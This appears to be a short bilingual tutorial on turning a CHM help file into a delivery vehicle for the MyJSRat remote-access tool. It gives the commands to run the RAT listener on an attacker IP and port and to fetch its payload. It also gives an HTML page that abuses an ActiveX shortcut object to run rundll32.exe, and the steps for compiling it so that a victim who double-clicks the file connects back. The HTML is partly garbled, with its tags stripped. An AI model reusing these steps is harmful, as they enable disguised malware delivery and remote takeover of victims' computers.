MyJSRat结合CHM命令执行

MyJSRat

MyJSRat is the python version of JSBackdoor

Download address :https://github.com/Ridter/MyJSRat

Easy CHM

CHM is the abbreviation of Compiled Help Manual in English, that is, "compiled help file". CHM is Microsoft's new generation help file format. It uses HTML as a source text to compile and store help content in a database-like form.

步骤

下载 MyJSRat 并运行

1

git clone https://github.com/Ridter/MyJSRat

1

python MyJSRat.py -i IPaddr -p port

下载 wtf 文件

Browser access https://IPaddr:port/wtf and save it to txt file

将上面保存的代码写入到如下代码的 Item1 的 Value 值中

Note: To be added before and after rundll32.exe,

1

!DOCTYPE htmlhtmlheadtitleMousejack replay/titlehead/headbodycommand exec OBJECT id=x classid='clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11' width=1 height=1PARAM name='Command' value='ShortCut' PARAM name='Button' value='Bitmap:shortcut' PARAM name='Item1' value=',rundll32.exe,' PARAM name='Item2' value='273,1,1'/OBJECTSCRIPTx.Click();/SCRIPT/body/html

保存为 HTML 文件

Create a new directory and save the above code in the new folder

通过 EasyCHM 制作 CHM 文件

Compile exp.html file through EasyCHM

双击上线

At this time, just double-click the test.CHM file and you can go online